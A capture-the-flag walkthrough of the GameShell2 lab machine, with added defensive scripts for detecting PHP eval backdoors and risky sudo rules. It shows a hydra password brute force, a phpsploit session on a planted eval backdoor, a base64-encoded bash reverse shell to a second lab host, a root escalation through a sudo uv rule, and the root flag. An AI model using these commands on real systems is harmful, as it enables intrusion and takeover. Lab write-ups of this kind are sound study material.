mazesec gameshell2
Enumeration
# Nmap 7.95 scan initiated Thu Dec 11 07:38:55 2025 as: /usr/lib/nmap/nmap --privileged -T4 --open -Pn -sV -v -oN nmap 192.168.110.17
Nmap scan report for GameShell2.lan (192.168.110.17)
Host is up (0.00019s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
79/tcp open finger OpenBSD fingerd (ported to Linux)
80/tcp open http Apache httpd 2.4.62 ((Debian))
MAC Address: 08:00:27:9A:11:EA (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: Host: GameShell2; OSs: Linux, Linux 4.19.0-27-amd64; CPE: cpe:/o:linux:linux_kernel, cpe:/o:linux:linux_kernel:4.19.0-27-amd64
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Dec 11 07:39:07 2025 -- 1 IP address (1 host up) scanned in 11.96 seconds
Website
$ gobuster dir -u http://192.168.110.17 -w /usr/share/wordlists/dirb/common.txt -x txt,php,html,bak
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.110.17
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Extensions: html,bak,txt,php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta.html (Status: 403) [Size: 279]
/.hta.bak (Status: 403) [Size: 279]
/.htaccess.txt (Status: 403) [Size: 279]
/.htaccess (Status: 403) [Size: 279]
/.hta.php (Status: 403) [Size: 279]
/.hta.txt (Status: 403) [Size: 279]
/.hta (Status: 403) [Size: 279]
/.htaccess.php (Status: 403) [Size: 279]
/.htaccess.html (Status: 403) [Size: 279]
/.htpasswd (Status: 403) [Size: 279]
/.htaccess.bak (Status: 403) [Size: 279]
/.htpasswd.txt (Status: 403) [Size: 279]
/.htpasswd.php (Status: 403) [Size: 279]
/.htpasswd.html (Status: 403) [Size: 279]
/.htpasswd.bak (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 14134]
/index.html (Status: 200) [Size: 14134]
/robots.txt (Status: 200) [Size: 35]
/robots.txt (Status: 200) [Size: 35]
/server-status (Status: 403) [Size: 279]
/terminal (Status: 401) [Size: 461]
/users.html (Status: 200) [Size: 2052]
wget http://192.168.110.17/users.html
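# Query fingerd for each candidate name; stop at the first account that exists.
for user in $(cat valid_users_list.txt); do
    result=$(finger "$user@192.168.110.17" 2>&1 | grep "Login:")
    if [ -n "$result" ]; then
        echo "找到有效用户: $user"   # message: "Found valid user"
        echo "$result"
        break
    fi
done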
hydra -l dt -P /usr/share/wordlists/rockyou.txt -f 192.168.110.17 http-get /terminal
-> dt:purple1
Finishing the game yields dt:0t4tdtlt
/var/www also contains a dev directory, so there may be a second website
Inspect /etc/apache2/sites-available/dev.astra.dsz.conf
ffuf finds backdoor.php
python3 phpsploit
phpsploit > set TARGET http://dev.astra.dsz/backdoor.php
phpsploit > exploit
[*] Current backdoor is: <?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>
[*] Sending payload to http://dev.astra.dsz:80/backdoor.php ...
[*] Shell obtained by PHP (127.0.0.1 -> 127.0.0.1)
Connected to Linux server (dev.astra.dsz)
running PHP 8.3.19 on Apache/2.4.62 (Debian)
phpsploit(dev.astra.dsz) > ls
Listing: /var/www/dev
=====================
Mode Owner Group Size Last Modified Name
---- ----- ----- ---- ------------- ----
drwx------ www-data www-data 4K Fri Nov 21 11:49:56 +0000 2025 .
drwxr-xr-x root root 4K Fri Nov 21 08:04:51 +0000 2025 ..
-rw-r--r-- root root 44 Fri Nov 21 08:02:19 +0000 2025 backdoor.php
-rw-r--r-- root root 68 Fri Nov 21 11:49:56 +0000 2025 index.html
phpsploit(dev.astra.dsz) > printf KGJhc2ggPiYgL2Rldi90Y3AvMTkyLjE2OC4xMTAuMTQxLzQ0NDQgMD4mMSkgJg==|base64 -d|bash
[-] Unknown Command: printf (use `run` plugin to run remote command)
[-] Unknown Command: | (use `run` plugin to run remote command)
[-] Unknown Command: base64 (use `run` plugin to run remote command)
[-] Unknown Command: | (use `run` plugin to run remote command)
[-] Unknown Command: bash (use `run` plugin to run remote command)
phpsploit(dev.astra.dsz) > run 'printf KGJhc2ggPiYgL2Rldi90Y3AvMTkyLjE2OC4xMTAuMTQxLzQ0NDQgMD4mMSkgJg==|base64 -d|bash'
phpsploit(dev.astra.dsz) >
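A defender-side check for files like the `backdoor.php` shown in this session, added here as an example and not part of the original write-up: it scans a web root for PHP that passes client-controlled superglobals (including `$_SERVER['HTTP_*']` request headers) into code-execution functions. The function names, the sink list and the sample files are constructed assumptions; a regex scan like this catches plain one-liners, not obfuscated code.

```python
import re
import tempfile
from pathlib import Path

# Superglobals an HTTP client controls; $_SERVER['HTTP_*'] carries request headers.
TAINTED = r"\$_(?:GET|POST|REQUEST|COOKIE|FILES|SERVER)\b"
# PHP constructs that execute code or shell commands (illustrative list).
SINKS = r"(?:eval|assert|system|exec|shell_exec|passthru|popen|proc_open)"
# A sink whose argument list (same statement, may span lines) mentions a tainted superglobal.
PATTERN = re.compile(r"@?\b" + SINKS + r"\s*\((?:[^;]*?)" + TAINTED, re.IGNORECASE)

def scan_php_source(source: str) -> list[tuple[int, str]]:
    """Return (line_number, snippet) for each sink fed by request data."""
    hits = []
    for match in PATTERN.finditer(source):
        line_no = source.count("\n", 0, match.start()) + 1
        hits.append((line_no, match.group(0).strip()))
    return hits

def scan_webroot(root: str) -> dict[str, list[tuple[int, str]]]:
    """Scan every *.php / *.phtml file under root; return only files with hits."""
    findings = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in {".php", ".phtml"}:
            hits = scan_php_source(path.read_text(errors="replace"))
            if hits:
                findings[str(path.relative_to(root))] = hits
    return findings

def demo() -> dict[str, list[tuple[int, str]]]:
    """Constructed web root: the one-liner quoted on the page plus a benign file."""
    with tempfile.TemporaryDirectory() as root:
        Path(root, "backdoor.php").write_text(
            "<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>\n")
        Path(root, "index.php").write_text(
            "<?php\n$name = htmlspecialchars($_GET['name'] ?? '');\necho \"Hello $name\";\n")
        return scan_webroot(root)

if __name__ == "__main__":
    for name, hits in demo().items():
        for line_no, snippet in hits:
            print(f"{name}:{line_no}: {snippet}")
```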
Privilege escalation
www-data@GameShell2:/var/www$ sudo -l
Matching Defaults entries for www-data on GameShell2:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on GameShell2:
(ALL) NOPASSWD: /usr/local/bin/uv
www-data@GameShell2:/var/www$ sudo /usr/local/bin/uv run /bin/bash
root@GameShell2:/var/www# cat /root/root.txt
flag{root-983b0f2b5412aadd94ed08f249355686}
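The rule above amounts to root because `uv run` starts any command it is given. As an added example (not from the original write-up), this audit parses `sudo -l` output and flags root rules for such command runners. The runner list is an illustrative assumption, the last two sample rules are constructed, and commands are split on plain commas.

```python
import re
from dataclasses import dataclass

# Illustrative, non-exhaustive set of programs that start arbitrary commands
# by design; `uv run <cmd>` is the case shown in this write-up.
COMMAND_RUNNERS = {"uv", "env", "bash", "sh", "python3", "perl", "find",
                   "vim", "awk", "xargs", "nohup", "timeout"}
ENTRY = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")

@dataclass
class Finding:
    runas: str
    nopasswd: bool
    command: str
    severity: str   # "high": any arguments allowed; "review": arguments pinned

def audit_sudo_l(output: str) -> list[Finding]:
    """Flag rules in `sudo -l` output that hand a command runner to the user."""
    findings, in_rules = [], False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        m = ENTRY.match(line) if in_rules else None
        if not m or m["runas"].split(":")[0].strip() not in ("ALL", "root"):
            continue   # not a rule line, or the rule does not grant root
        for cmd in (c.strip() for c in m["cmds"].split(",")):
            path, _, args = cmd.partition(" ")
            name = path.rsplit("/", 1)[-1]
            if path == "ALL" or name in COMMAND_RUNNERS:
                # sudoers: a rule with no argument list permits any arguments.
                sev = "review" if args.strip() else "high"
                findings.append(Finding(m["runas"], "NOPASSWD:" in m["tags"], cmd, sev))
    return findings

# `sudo -l` output from the page (Defaults abridged) plus two constructed rules.
SAMPLE = """\
Matching Defaults entries for www-data on GameShell2:
    env_reset, mail_badpass
User www-data may run the following commands on GameShell2:
    (ALL) NOPASSWD: /usr/local/bin/uv
    (root) /usr/bin/find /var/log -name auth.log
    (backup) NOPASSWD: /usr/bin/env
"""

if __name__ == "__main__":
    print(*audit_sudo_l(SAMPLE), sep="\n")
```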